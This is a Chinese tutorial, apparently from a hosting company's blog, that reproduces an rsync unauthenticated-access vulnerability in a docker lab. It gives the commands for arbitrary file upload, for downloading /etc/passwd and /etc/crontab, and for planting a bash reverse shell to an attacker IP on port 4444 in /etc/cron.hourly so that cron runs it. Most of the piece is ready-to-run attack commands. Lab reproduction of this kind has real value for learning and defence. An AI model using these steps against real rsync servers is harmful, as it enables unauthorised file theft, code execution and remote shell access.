rsync漏洞復(fù)現(xiàn)的示例分析

小編給大家分享一下rsync漏洞復(fù)現(xiàn)的示例分析，相信大部分人都還不怎么了解，因此分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后大有收獲，下面讓我們一起去了解一下吧！

rsync漏洞復(fù)現(xiàn)

1.首先要進(jìn)入我們下載的漏洞環(huán)境目錄

2.編譯及運(yùn)行rsync服務(wù)器：

docker-compose up -d

發(fā)現(xiàn)拉取成功

查看地址

3.漏洞復(fù)現(xiàn)

先查看一下他的模塊的文件

rsync rsync://127.0.0.1/src

任意文件上傳

只需要touch隨便創(chuàng)建一個(gè)即可

rsync zxc.txt rsync://127.0.0.1/src/home

查看上傳的文件

rsync rsync://127.0.0.1:873/src/home/zxc.txt

任意文件下載

rsync://127.0.0.1/src/etc/passwd

通過寫cron任務(wù)反彈shell

1、下載任務(wù)計(jì)劃文件

rsync -av rsync://127.0.0.1/src/etc/crontab crontab.txt

任務(wù)計(jì)劃表示在每小時(shí)的第17分鐘執(zhí)行run-parts --report /etc/cron.hourly命令

17 * * * * root cd / && run-parts --report /etc/cron.hourly

2、構(gòu)造shell

#!/bin/bash /bin/bash -i >& /dev/tcp/192.168.0.128/4444 0>&1 //ip為kali的地址

上傳shell

rsync -av shell rsync://127.0.0.1/src/etc/cron.hourly

然后反彈shell，但是需要等17分鐘，要不然要修改那個(gè)文件

第二種獲取shell的方式

docker ps

sudo docker exec -it c1de2543df7b bash

發(fā)現(xiàn)成功了

正好我們?cè)谶@里修改一下那個(gè)執(zhí)行文件

首先要安裝vim

apt-get update ##更新

apt install vim

然后修改成一分鐘

或者第二步驟：

直接進(jìn)入上傳shell 那個(gè)目錄

cd /etc/cron.hourly/

./shell

發(fā)現(xiàn)反彈成功

以上是“rsync漏洞復(fù)現(xiàn)的示例分析”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家都有了一定的了解，希望分享的內(nèi)容對(duì)大家有所幫助，如果還想學(xué)習(xí)更多知識(shí)，歡迎關(guān)注億速云行業(yè)資訊頻道！